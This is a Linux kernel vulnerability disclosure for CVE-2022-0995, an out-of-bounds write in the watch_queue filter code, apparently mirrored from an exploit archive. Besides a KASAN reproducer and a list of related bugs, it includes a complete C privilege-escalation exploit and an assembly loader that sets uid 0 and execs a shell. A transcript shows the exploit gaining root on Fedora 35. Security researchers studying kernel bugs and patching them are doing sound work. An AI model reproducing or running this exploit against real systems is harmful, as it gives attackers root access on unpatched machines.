Share
## https://sploitus.com/exploit?id=PACKETSTORM:189874
This bug report is about things in the watch_queue subsystem,
    which is only enabled under CONFIG_WATCH_QUEUE. That seems to be
    disabled e.g. on Debian, but Ubuntu and Fedora enable it.
    
    The watch_queue subsystem has a bug that leads to out-of-bounds
    write in watch_queue_set_filter():
    The first loop correctly checks for
    
    if (tf[i].type >= sizeof(wfilter->type_filter) * 8)
    
    but the second loop has the bound for .type wrong by a factor of 8
    (on 64-bit systems):
    
    if (tf[i].type >= sizeof(wfilter->type_filter) * BITS_PER_LONG)
    
    This leads to two out-of-bounds writes:
    
        out-of-bounds __set_bit() on wfilter->type_filter
        out-of-bounds write of array elements behind wfilter->filters
    
    The following reproducer triggers an ASAN splat:
    
    #define _GNU_SOURCE  
    #include <unistd.h>  
    #include <err.h>  
    #include <stdio.h>  
    #include <stdlib.h>  
    #include <sys/ioctl.h>  
    #include <sys/syscall.h>  
    #include <linux/watch_queue.h>  
      
    int main(void) {  
      int pipefds[2];  
      if (pipe2(pipefds, O_NOTIFICATION_PIPE))  
        err(1, "pipe2");  
      int pfd = pipefds[0];  
      
      struct watch_notification_filter \*filter =  
        malloc(sizeof(struct watch_notification_filter) +  
               sizeof(struct watch_notification_type_filter));  
      filter->nr_filters = 1;  
      filter->__reserved = 0;  
      filter->filters[0] = (struct watch_notification_type_filter){ .type = 1023 };  
      if (ioctl(pfd, IOC_WATCH_QUEUE_SET_FILTER, filter))  
        err(1, "SET_FILTER");  
    }  
    
    Here's the splat:
    
    [   83.180406][  T611] ==================================================================  
    [   83.181694][  T611] BUG: KASAN: slab-out-of-bounds in watch_queue_set_filter+0x659/0x740  
    [   83.182928][  T611] Write of size 4 at addr ffff88800d2c66bc by task watch_queue_oob/611  
    [...]  
    [   83.187234][  T611] Call Trace:  
    [   83.187712][  T611]  <TASK>  
    [   83.188133][  T611]  dump_stack_lvl+0x45/0x59  
    [   83.188796][  T611]  print_address_description.constprop.0+0x1f/0x150  
    [...]  
    [   83.190539][  T611]  kasan_report.cold+0x7f/0x11b  
    [...]  
    [   83.192236][  T611]  watch_queue_set_filter+0x659/0x740  
    [...]  
    [   83.194563][  T611]  __x64_sys_ioctl+0x127/0x190  
    [   83.195297][  T611]  do_syscall_64+0x43/0x90  
    [   83.195941][  T611]  entry_SYSCALL_64_after_hwframe+0x44/0xae  
    [...]  
    [   83.208194][  T611] Allocated by task 611:  
    [   83.208807][  T611]  kasan_save_stack+0x1e/0x40  
    [   83.209479][  T611]  __kasan_kmalloc+0x81/0xa0  
    [   83.210258][  T611]  watch_queue_set_filter+0x23a/0x740  
    [   83.211027][  T611]  __x64_sys_ioctl+0x127/0x190  
    [   83.211708][  T611]  do_syscall_64+0x43/0x90  
    [   83.212341][  T611]  entry_SYSCALL_64_after_hwframe+0x44/0xae  
    [   83.213177][  T611]   
    [   83.213510][  T611] The buggy address belongs to the object at ffff88800d2c66a0  
    [   83.213510][  T611]  which belongs to the cache kmalloc-32 of size 32  
    [   83.215452][  T611] The buggy address is located 28 bytes inside of  
    [   83.215452][  T611]  32-byte region [ffff88800d2c66a0, ffff88800d2c66c0)  
    
    In case you're wondering why syzkaller never managed to hit this:
    It actually has a definition file for watch queue stuff
    (https://github.com/google/syzkaller/blob/master/sys/linux/dev_watch_queue.txt),
    but that seems to be based on an older version of the series that introduced
    watch queues, so syzkaller doesn't know about O_NOTIFICATION_PIPE and instead
    tries to open /dev/watch_queue.
    
    Here's an extremely shoddy exploit that will sometimes give you a root shell
    on Fedora 35 and sometimes instead make the system hang/panic:
    
    [user@fedora watch_queue]$ cat watch_queue_oob_elf_phdr.c  
    #define _GNU_SOURCE  
    #include <unistd.h>  
    #include <err.h>  
    #include <stdio.h>  
    #include <stddef.h>  
    #include <sched.h>  
    //header conflict :/  
    //#include <fcntl.h>  
    int open(const char \*pathname, int flags, ...);  
    #include <stdlib.h>  
    #include <sys/ioctl.h>  
    #include <sys/inotify.h>  
    #include <sys/eventfd.h>  
    #include <sys/resource.h>  
    #include <sys/xattr.h>  
    #include <sys/wait.h>  
    #include <sys/mount.h>  
    #include <sys/syscall.h>  
    #include <linux/watch_queue.h>  
    #include <linux/elf.h>  
      
    #define SYSCHK(x) ({          \  
      typeof(x) __res = (x);      \  
      if (__res == (typeof(x))-1) \  
        err(1, "SYSCHK(" #x ")"); \  
      __res;                      \  
    })  
      
    int main(void) {  
      struct rlimit rlim_nofile;  
      SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim_nofile));  
      rlim_nofile.rlim_cur = rlim_nofile.rlim_max;  
      SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim_nofile));  
      
      // pin to one CPU core  
      cpu_set_t cpu_set;  
      CPU_ZERO(&cpu_set);  
      CPU_SET(0, &cpu_set);  
      SYSCHK(sched_setaffinity(0, sizeof(cpu_set_t), &cpu_set));  
      
      // create notification pipes, without filters yet  
      int pfds[128];  
      for (int i=0; i<128; i++) {  
        int pipefds[2];  
        SYSCHK(pipe2(pipefds, O_NOTIFICATION_PIPE));  
        pfds[i] = pipefds[0];  
        close(pipefds[1]);  
      }  
      
      // create a child with SCHED_IDLE policy that runs execve() when told to  
      int continue_eventfd = SYSCHK(eventfd(0, 0));  
      pid_t child = SYSCHK(fork());  
      if (child == 0) {  
        struct sched_param param = { .sched_priority = 0 };  
        SYSCHK(sched_setscheduler(0, SCHED_IDLE, &param));  
      
        eventfd_t evfd_value;  
        SYSCHK(eventfd_read(continue_eventfd, &evfd_value));  
      
        SYSCHK(execl("/usr/bin/newgrp", "newgrp", "--bogus", "/bin/bash", NULL));  
      }  
      
      // set up an inotify watch to notify us every time the ELF parser reads from  
      // the ELF binary (which involves preempting the ELF parser).  
      int infd = SYSCHK(inotify_init());  
      SYSCHK(inotify_add_watch(infd, "/usr/bin/newgrp", IN_ACCESS));  
      
      // spam kmalloc-32 a bit. note that this might not be enough spam, depending  
      // on how fragmented the slab is...  
      // after spamming the slab, free all our allocations again, so that hopefully  
      // we end up with a (more or less) empty CPU slab.  
    #define NUM_SPAM 10000 /\* 900 \*/  
      SYSCHK(unshare(CLONE_NEWUSER|CLONE_NEWNS));  
      SYSCHK(mount("none", "/dev/shm", "tmpfs", MS_NOSUID|MS_NODEV, ""));  
      int tmpfile = SYSCHK(open("/dev/shm/", O_TMPFILE|O_RDWR, 0666));  
      for (int i=0; i<NUM_SPAM; i++) {  
        char name[14] = "security.XXXX";  
        name[ 9] = 'A' + ((i >>  0) % 16);  
        name[10] = 'A' + ((i >>  4) % 16);  
        name[11] = 'A' + ((i >>  8) % 16);  
        name[12] = 'A' + ((i >> 12) % 16);  
        SYSCHK(fsetxattr(tmpfile, name, "", 0, XATTR_CREATE));  
      }  
      close(tmpfile);  
      
      // launch the ELF parser and preempt at every read.  
      // note that PREEMPT_VOLUNTARY means we actually don't get rescheduled  
      // directly at kernel_read(), instead it happens on the next kmalloc():  
      // __kmalloc() -> slab_alloc() -> slab_alloc_node() -> slab_pre_alloc_hook()  
      // -> might_alloc() -> might_sleep_if() -> might_sleep() -> might_resched()  
      // -> __cond_resched()  
      //  
      // First preemption is the allocation of memory for program headers,  
      // second preemption is the allocation of memory for the interpreter name.  
      // At the second preemption, the program headers have been loaded into  
      // memory but the interpreter name's offset hasn't been read yet.  
      // Third preemption is after the interpreter name has been stored in the  
      // allocation but before it is passed to the VFS for opening.  
      SYSCHK(eventfd_write(continue_eventfd, 1));  
      for (int i=0; i<3; i++) {  
        struct inotify_event inev;  
        if (SYSCHK(read(infd, &inev, sizeof(inev))) != sizeof(inev))  
          errx(1, "bad inotify_event size");  
      }  
      
      struct watch_notification_filter \*filter =  
        malloc(sizeof(struct watch_notification_filter) +  
               2 \* sizeof(struct watch_notification_type_filter));  
      filter->nr_filters = 1;  
      filter->__reserved = 0;  
      filter->filters[0] = (struct watch_notification_type_filter){  
        .type = 20 \* 8,  
        .info_mask = 0x80  
      };  
      for (int i=0; i<127; i++) {  
        SYSCHK(ioctl(pfds[i], IOC_WATCH_QUEUE_SET_FILTER, filter));  
      }  
      
      int status;  
      int wait_res = wait(&status);  
      printf("wait_res = %d\n", wait_res);  
      if (WIFEXITED(status)) {  
        printf("exited with status %d\n", WEXITSTATUS(status));  
      } else if (WIFSIGNALED(status)) {  
        printf("signaled with signal %d\n", WTERMSIG(status));  
      } else {  
        printf("other?\n");  
      }  
    }  
    [user@fedora watch_queue]$ gcc -o watch_queue_oob_elf_phdr watch_queue_oob_elf_phdr.c  
    [user@fedora watch_queue]$ cat bogus-loader.S  
    .global _start  
    _start:  
    /\* setresuid(0, 0, 0) \*/  
    mov $117, %eax  
    mov $0, %rdi  
    mov $0, %rsi  
    mov $0, %rdx  
    syscall  
      
    /\* execve(argv[2], argv+2, envv) \*/  
    mov $59, %eax  
    mov 24(%rsp), %rdi  
    lea 24(%rsp), %rsi  
    lea 40(%rsp), %rdx /\* assume argc==3 \*/  
    syscall  
    int $3  
    [user@fedora watch_queue]$ as -o bogus-loader.o bogus-loader.S  
    [user@fedora watch_queue]$ ld -shared -o $'\x80' bogus-loader.o  
    [user@fedora watch_queue]$ ./watch_queue_oob_elf_phdr   
    [root@fedora watch_queue]# id  
    uid=0(root) gid=1000(user) groups=1000(user),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023  
    
    There are also some other bugs in the subsystem, but those are less
    easy to exploit or not security bugs at all:
    
        free_pipe_info() first calls put_watch_queue(), which RCU-frees the
        struct watch_queue. Then afterwards it calls pipe_buf_release() on the
        pipe buffers, which calls watch_queue_pipe_buf_release(), which calls
        set_bit() on the already RCU-freed watch_queue. This is at least
        theoretically a UAF, in particular under CONFIG_PREEPMT.
    
        watch_queue_pipe_buf_ops has a .get handler that calls
        try_get_page() and a .release handler that doesn't touch the page count.
        This would be a bug, except that this is dead code because none of the
        splice stuff works on notification pipes.
    
        From what I can tell, watch_queue_set_size() permits setting a
        non-power-of-two number of buffers, which will break the code that
        assumes that you can use bitmasks instead of modulo for indexing into
        the pipe buffers array.
    
        watch_queue_set_size() sets wqueue->nr_notes to nr_notes rounded up
        to a multiple of WATCH_QUEUE_NOTES_PER_PAGE while allocating the
        ->notes_bitmap with size nr_notes bits rounded up to a multiple of
        BITS_PER_LONG. On architectures with big PAGE_SIZE, this could lead to
        wqueue->nr_notes being bigger than the bitmap.
    
        wqueue->notes_bitmap is never freed.
    
        There is no synchronization between post_one_notification() and
        pipe_read(), neither locking nor smp_store_release().
    
        watch_queue_clear() has a comment claiming that ->defunct prevents
        new additions and notifications, but actually it only prevents
        notifications, not additions.
    
    This bug is subject to a 90-day disclosure deadline. If a fix for this
    issue is made available to users before the end of the 90-day deadline,
    this bug report will become public 30 days after the fix was made
    available. Otherwise, this bug report will become public at the deadline.
    The scheduled deadline is 2022-06-08.
    
    
    Related CVE Number: CVE-2022-0995.
    
    Credit: Jann Horn